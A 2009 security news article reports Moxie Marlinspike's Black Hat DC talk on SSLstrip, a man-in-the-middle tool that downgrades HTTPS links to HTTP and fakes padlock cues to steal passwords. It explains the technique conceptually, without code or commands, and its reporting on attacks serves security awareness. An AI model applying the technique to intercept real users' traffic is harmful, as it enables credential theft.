SSLstrip hacking tool bypasses SSL to trick users, steal passwords

By Neil Roiter, Senior Technology Editor, Information Security magazine 18 Feb 2009 | SearchSecurity.com

Security Wire Daily News Digg This!     StumbleUpon     Del.icio.us

ARLINGTON, Va. -- How do you exploit Hypertext Transfer Protocol Secure (HTTPS), tightly wrapped in SSL or TLS?

SearchSecurity.com: To get security news and tips delivered to your inbox, click here to sign up for our free newsletter.

According to Moxie Marlinspike, you don't. You exploit the HTTP it's built on. If you think about it, he told a Black Hat DC Briefings audience Wednesday, people encounter SSL by clicking on a link and being redirected to an HTTPS-secured page when they log into banking, webmail or shopping websites.

Marlinspike unveiled a hacking technique which intercepts Web traffic and tricks users into giving up passwords and other sensitive information. With the aid of a new tool called SSLstrip, Marlinspike demonstrated how easy it is to trick users into thinking they are on a trusted, secure website.

"People only encounter HTTPS via HTTP, so maybe we can think about starting by attacking HTTP," he said. "Normally, if we're doing man-in-the-middle attacks against SSL, we go straight for SSL, straight after that connection. But if SSL depends on this other protocol, why don't we look at that first?"

Black Hat DC Briefings: Intel Trusted Execution Technology is flawed, Black Hat researchers show: Security researchers Joanna Rutkowska and colleague Rafal Wojtczuk have discovered new Intel bugs that would allow attackers to bypass Intel Trusted Execution Technology.

The trick, said Marlinspike, is duplicating a Web environment in which people are comfortable, in which they feel safe. Not long ago, he said, websites emphasized what he called positive feedback. You see the ubiquitous padlock icon and perhaps the URL address window turned a reassuring color.

But now, newer browsers like Firefox 3 and IE8 display dire, in-your-face warnings that only the most reckless Web surfer would ignore. So, if you're trying to trick people into inputting their credit card numbers into Web pages they think are secured by SSL --but that you own -- you want them to see a page that looks almost, if not completely normal. Positive feedback is pretty subtle.

"If we trigger negative feedback, we're totally screwed. People only care if it's catastrophic problem: 'Look out!'" he said. "If we fail to trigger positive feedback, maybe it's not so bad. People aren't really keeping an eagle eye out for all those positive indicators."

The basic idea is to intercept Web traffic with a new tool called SSLstrip. The tool switches the hyperlink reference (href) from HTTPS to HTTP and swaps the user to an insecure look-alike page. The server thinks everything is secure, because it is unaware of the exchange between the victim and the client, and the client gets no warning.

SearchSecurity radio:

You can even add your own padlock icon to improve the user's comfort level.

Once you've got what you want from the victim, SSLstrip can be set to drop out and the user is once again presented with an SSL-protected page after the damage is done.

User names and passwords are particularly desirable targets.

"The real nice thing about passwords is that people reuse their passwords. So, if you get their passwords to one site, you've probably got their passwords to 10 or more sites," Marlinspike said.

Tags: SSL and TLS VPN Security,  Web Browser Security,  Hacker Tools and Techniques: Underground Sites and Hacking Groups,  VIEW ALL TAGS

Digg This!     StumbleUpon     Del.icio.us

RELATED CONTENT SSL and TLS VPN Security Expert calls SSL protocol vulnerability a non issue How SSL-encrypted Web connections are intercepted Best Remote Access Products How to set up a split-tunnel VPN in Windows Vista Securing the intranet with remote access VPN security A short enterprise VPN deployment guide Creating an SSL connection between servers Can S/MIME, XML and IPsec operate in one protocol layer? Can secure USB devices prevent man-in-the middle attacks How to secure SSL following new man-in-the-middle SSL attacks Web Browser Security InZero Systems launches hardware-based security gateway Web security firm ranks Firefox, Safari browsers as flaw prone Microsoft fixes security update that breaks Internet Explorer Mozilla update repairs Firefox buffer overflow vulnerabilities Kaspersky system analyzes malicious URLs on Twitter for malware Silon malware intercepts Internet Explorer sessions, steals credentials Do Facebook URL security concerns justify blocking social networks? Phishing attacks to remain a major problem, say security experts Adrian Perrig: Improve SSL/TLS Security Through Education and Technology New Bahama botnet evades search engines, fuels click fraud Web Browser Security Research Hacker Tools and Techniques: Underground Sites and Hacking Groups Russian cybercriminals target H1N1 Swine Flu fears Metasploit Project acquisition ups ante for penetration testing market Successful rogue antivirus hinges on social engineering DEFCON survey suggests hacker community on vacation DoD urges less network anonymity, more PKI use New hacker skills optimize revenue Maturing cybercriminal economy buoyed by business savvy hackers Juniper pulls ATM hacking presentation from Black Hat Botnet platform helps cybercriminals bid for zombie PCs Man pleads guilty in online banking hacking scam

RELATED GLOSSARY TERMS Terms from Whatis.com − the technology online dictionary Secure Shell  (SearchSecurity.com) Secure Sockets Layer  (SearchSecurity.com) server accelerator card  (SearchSecurity.com) SSL VPN  (SearchSecurity.com) Transport Layer Security  (SearchSecurity.com)

RELATED RESOURCES 2020software.com, trial software downloads for accounting software, ERP software, CRM software and business software systems Search Bitpipe.com for the latest white papers and business webcasts Whatis.com, the online computer dictionary